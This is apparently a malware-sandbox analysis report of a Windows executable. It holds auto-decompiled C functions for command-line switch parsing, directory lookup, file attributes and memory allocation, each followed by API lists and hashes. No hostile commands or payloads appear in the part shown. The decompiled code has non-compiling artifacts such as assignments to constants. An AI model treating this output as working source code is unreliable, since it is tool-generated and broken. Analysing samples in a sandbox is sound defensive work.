                                                                                                                                                                                                        0x001f65c3
                                                                                                                                                                                                        0x001f65c5
                                                                                                                                                                                                        0x001f65c8
                                                                                                                                                                                                        0x001f65c8
                                                                                                                                                                                                        0x001f65c3
                                                                                                                                                                                                        0x001f65c9
                                                                                                                                                                                                        0x001f65cc
                                                                                                                                                                                                        0x001f65d2
                                                                                                                                                                                                        0x001f65d1
                                                                                                                                                                                                        0x001f65d1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f65dc
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(001F8B3E,001F8B3F,00000001,001F8B3E,-00000003,?,001F60EC,001F1140,?), ref: 001F65BA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharPrev
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 122130370-0
                                                                                                                                                                                                        • Opcode ID: f5bdef4efa60ca2af5241b522c8ee4b62a99a6726affe6650f4eb9415bfc4571
                                                                                                                                                                                                        • Instruction ID: fb7eb16efeb9974fd4a7747824d6cad2b0bad8000a6b8e17e5e7fa5c30f4a3d6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5bdef4efa60ca2af5241b522c8ee4b62a99a6726affe6650f4eb9415bfc4571
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BBF0A2321082589BD731051D9884B76BFCD9B96390F19015EEADEE3229CB554C4283A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E001F621E() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					0x4f0 = 2;
                                                                                                                                                                                                        					_t9 = E001F597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E001F44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        					_t9 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x001f6229
                                                                                                                                                                                                        0x001f6230
                                                                                                                                                                                                        0x001f6247
                                                                                                                                                                                                        0x001f626a
                                                                                                                                                                                                        0x001f6272
                                                                                                                                                                                                        0x001f6249
                                                                                                                                                                                                        0x001f6255
                                                                                                                                                                                                        0x001f625f
                                                                                                                                                                                                        0x001f6264
                                                                                                                                                                                                        0x001f6264
                                                                                                                                                                                                        0x001f6284

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001F623F
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                          • Part of subcall function 001F6285: GetLastError.KERNEL32(001F5BBC), ref: 001F6285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 381621628-0
                                                                                                                                                                                                        • Opcode ID: abf7e8449c13bcf8b6a9853b746c3841ac6d190af39e278d363875eced9385d3
                                                                                                                                                                                                        • Instruction ID: 2f3088d780d43c292668c8d1f85188d5cd922cbe29c4de26837265bf4e9d9a11
                                                                                                                                                                                                        • Opcode Fuzzy Hash: abf7e8449c13bcf8b6a9853b746c3841ac6d190af39e278d363875eced9385d3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BF082B070420CABE754EB749D06FBE77ACDBA4700F40046ABB8AD6191EF749D94C650
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F4B60(signed int _a4) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 = _a4 * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t15 + 0x1f8d64)) != 1) {
                                                                                                                                                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0x1f8d74)); // executed
                                                                                                                                                                                                        					if(_t9 == 0) {
                                                                                                                                                                                                        						return _t9 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *((intOrPtr*)(_t15 + 0x1f8d60)) = 1;
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0x1f8d60)) = 1;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0x1f8d68)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0x1f8d70)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0x1f8d6c)) = 0;
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        0x001f4b66
                                                                                                                                                                                                        0x001f4b74
                                                                                                                                                                                                        0x001f4b98
                                                                                                                                                                                                        0x001f4ba0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4bac
                                                                                                                                                                                                        0x001f4ba4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4ba4
                                                                                                                                                                                                        0x001f4b78
                                                                                                                                                                                                        0x001f4b7e
                                                                                                                                                                                                        0x001f4b84
                                                                                                                                                                                                        0x001f4b8a
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,001F4FA1,00000000), ref: 001F4B98
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        • Opcode ID: 2bc7f0849eb4e67dc1debc1c6d35efeb66a5a254fbb94c48122fc7100b9ee426
                                                                                                                                                                                                        • Instruction ID: 9865eedb74ef24e3890dfdcca260e5a8413c74db73dda792163dea5fb421cc6f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2bc7f0849eb4e67dc1debc1c6d35efeb66a5a254fbb94c48122fc7100b9ee426
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AAF012B1500B0C9FC771DFB9DC08673BBE4AF95365310892E957ED2195EB30A441CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F66AE(CHAR* __ecx) {
                                                                                                                                                                                                        				unsigned int _t1;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                        				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x001f66b1
                                                                                                                                                                                                        0x001f66ba
                                                                                                                                                                                                        0x001f66c7
                                                                                                                                                                                                        0x001f66bc
                                                                                                                                                                                                        0x001f66be
                                                                                                                                                                                                        0x001f66be

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,001F4777,?,001F4E38,?), ref: 001F66B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                        • Opcode ID: 757f0d580610affaf3cc133fbec45f39e4a1f7d8720824756b8f677ea7ad738b
                                                                                                                                                                                                        • Instruction ID: 1881618b0e7ac187b8e3e25a1bd24e0e7992a5eedc0a2a307c65f4487a091f8d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 757f0d580610affaf3cc133fbec45f39e4a1f7d8720824756b8f677ea7ad738b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1B092B6222444426A2006317C295662941ABC123A7E81B90F136C15E0CF3EC886D008
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F4CA0(long _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x001f4caa
                                                                                                                                                                                                        0x001f4cb1

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 001F4CAA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3761449716-0
                                                                                                                                                                                                        • Opcode ID: 8007cc6c70b6207f5038433654b322569804678d27e17eec9130a95ddabd79ff
                                                                                                                                                                                                        • Instruction ID: 949d4ce371fbea99f71b3594202001e0d6376ec1812cba82484c015eccea9438
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8007cc6c70b6207f5038433654b322569804678d27e17eec9130a95ddabd79ff
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AB0123204420CB7CF001FC2FC09F953F1DEBC4761F540000F60C454908E729450C69A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F4CC0(void* _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x001f4cc8
                                                                                                                                                                                                        0x001f4ccf

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2979337801-0
                                                                                                                                                                                                        • Opcode ID: bc7718e0601165afcdfc1a0d48c2609b7307bbbf6874da5ab927e02d51dd2f43
                                                                                                                                                                                                        • Instruction ID: 0def3339632b7732d541187a936af4c97673b7035ccc48bf137e9792e42acdeb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc7718e0601165afcdfc1a0d48c2609b7307bbbf6874da5ab927e02d51dd2f43
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92B0123100010CB78F001B42FC088553F1DDBC02607400010F50C414218F379851C585
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E001F5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				CHAR* _v265;
                                                                                                                                                                                                        				char _v266;
                                                                                                                                                                                                        				char _v267;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				CHAR* _v272;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				signed int _v296;
                                                                                                                                                                                                        				char _v556;
                                                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				CHAR* _t69;
                                                                                                                                                                                                        				signed int _t71;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				char _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				intOrPtr _t88;
                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                                                                        				void* _t111;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				void* _t119;
                                                                                                                                                                                                        				void* _t127;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                                        				void* _t142;
                                                                                                                                                                                                        				signed int _t143;
                                                                                                                                                                                                        				CHAR* _t144;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                                        				void* _t147;
                                                                                                                                                                                                        				void* _t149;
                                                                                                                                                                                                        				char _t155;
                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                        				void* _t162;
                                                                                                                                                                                                        				void* _t163;
                                                                                                                                                                                                        				char _t167;
                                                                                                                                                                                                        				char _t170;
                                                                                                                                                                                                        				CHAR* _t173;
                                                                                                                                                                                                        				void* _t177;
                                                                                                                                                                                                        				intOrPtr* _t183;
                                                                                                                                                                                                        				intOrPtr* _t192;
                                                                                                                                                                                                        				CHAR* _t199;
                                                                                                                                                                                                        				void* _t200;
                                                                                                                                                                                                        				CHAR* _t201;
                                                                                                                                                                                                        				void* _t205;
                                                                                                                                                                                                        				void* _t206;
                                                                                                                                                                                                        				int _t209;
                                                                                                                                                                                                        				void* _t210;
                                                                                                                                                                                                        				void* _t212;
                                                                                                                                                                                                        				void* _t213;
                                                                                                                                                                                                        				CHAR* _t218;
                                                                                                                                                                                                        				intOrPtr* _t219;
                                                                                                                                                                                                        				intOrPtr* _t220;
                                                                                                                                                                                                        				signed int _t221;
                                                                                                                                                                                                        				signed int _t223;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t173 = __ecx;
                                                                                                                                                                                                        				_t61 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                        				_push(__ebx);
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_push(__edi);
                                                                                                                                                                                                        				_t209 = 1;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                        					_t63 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					while(_t209 != 0) {
                                                                                                                                                                                                        						_t67 =  *_t173;
                                                                                                                                                                                                        						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                        							_t173 = CharNextA(_t173);
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v272 = _t173;
                                                                                                                                                                                                        						if(_t67 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t69 = _v272;
                                                                                                                                                                                                        							_t177 = 0;
                                                                                                                                                                                                        							_t213 = 0;
                                                                                                                                                                                                        							_t163 = 0;
                                                                                                                                                                                                        							_t202 = 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								if(_t213 != 0) {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L21;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t69 =  *_t69;
                                                                                                                                                                                                        									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t69 = _v272;
                                                                                                                                                                                                        										L21:
                                                                                                                                                                                                        										_t155 =  *_t69;
                                                                                                                                                                                                        										if(_t155 != 0x22) {
                                                                                                                                                                                                        											if(_t202 >= 0x104) {
                                                                                                                                                                                                        												goto L106;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                        												_t177 = _t177 + 1;
                                                                                                                                                                                                        												_t202 = _t202 + 1;
                                                                                                                                                                                                        												_t157 = 1;
                                                                                                                                                                                                        												goto L30;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											if(_v272[1] == 0x22) {
                                                                                                                                                                                                        												if(_t202 >= 0x104) {
                                                                                                                                                                                                        													L106:
                                                                                                                                                                                                        													_t63 = 0;
                                                                                                                                                                                                        													L125:
                                                                                                                                                                                                        													_pop(_t210);
                                                                                                                                                                                                        													_pop(_t212);
                                                                                                                                                                                                        													_pop(_t162);
                                                                                                                                                                                                        													return E001F6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                        													_t177 = _t177 + 1;
                                                                                                                                                                                                        													_t202 = _t202 + 1;
                                                                                                                                                                                                        													_t157 = 2;
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t157 = 1;
                                                                                                                                                                                                        												if(_t213 != 0) {
                                                                                                                                                                                                        													_t163 = 1;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t213 = 1;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L30;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L131;
                                                                                                                                                                                                        								L30:
                                                                                                                                                                                                        								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                        								_t69 = _v272;
                                                                                                                                                                                                        							} while ( *_t69 != 0);
                                                                                                                                                                                                        							if(_t177 >= 0x104) {
                                                                                                                                                                                                        								E001F6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                        								asm("int3");
                                                                                                                                                                                                        								_push(_t221);
                                                                                                                                                                                                        								_t222 = _t223;
                                                                                                                                                                                                        								_t71 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                        								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                        									0x4f0 = 2;
                                                                                                                                                                                                        									_t75 = E001F597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E001F44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                        									 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        									_t75 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								return E001F6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                        								if(_t213 == 0) {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										goto L34;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L40;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										_t79 = _v268;
                                                                                                                                                                                                        										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                        											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                        											if(_t83 == 0) {
                                                                                                                                                                                                        												_t202 = 0x521;
                                                                                                                                                                                                        												E001F44B9(0, 0x521, 0x1f1140, 0, 0x40, 0);
                                                                                                                                                                                                        												_t85 =  *0x1f8588; // 0x0
                                                                                                                                                                                                        												if(_t85 != 0) {
                                                                                                                                                                                                        													CloseHandle(_t85);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												ExitProcess(0);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t87 = _t83 - 4;
                                                                                                                                                                                                        											if(_t87 == 0) {
                                                                                                                                                                                                        												if(_v266 != 0) {
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                        														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                        														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                        														_t202 = _t50;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t88 =  *_t183;
                                                                                                                                                                                                        															_t183 = _t183 + 1;
                                                                                                                                                                                                        														} while (_t88 != 0);
                                                                                                                                                                                                        														if(_t183 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t205 = 0x5b;
                                                                                                                                                                                                        															if(E001F667F(_t215, _t205) == 0) {
                                                                                                                                                                                                        																L115:
                                                                                                                                                                                                        																_t206 = 0x5d;
                                                                                                                                                                                                        																if(E001F667F(_t215, _t206) == 0) {
                                                                                                                                                                                                        																	L117:
                                                                                                                                                                                                        																	_t202 =  &_v276;
                                                                                                                                                                                                        																	_v276 = _t167;
                                                                                                                                                                                                        																	if(E001F5C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t202 = 0x104;
                                                                                                                                                                                                        																		E001F1680(0x1f8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t202 = 0x5b;
                                                                                                                                                                                                        																	if(E001F667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		goto L117;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t202 = 0x5d;
                                                                                                                                                                                                        																if(E001F667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L115;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													 *0x1f8a24 = 1;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L50;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t100 = _t87 - 1;
                                                                                                                                                                                                        												if(_t100 == 0) {
                                                                                                                                                                                                        													L98:
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                        														_t202 = _t38;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t101 =  *_t192;
                                                                                                                                                                                                        															_t192 = _t192 + 1;
                                                                                                                                                                                                        														} while (_t101 != 0);
                                                                                                                                                                                                        														if(_t192 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
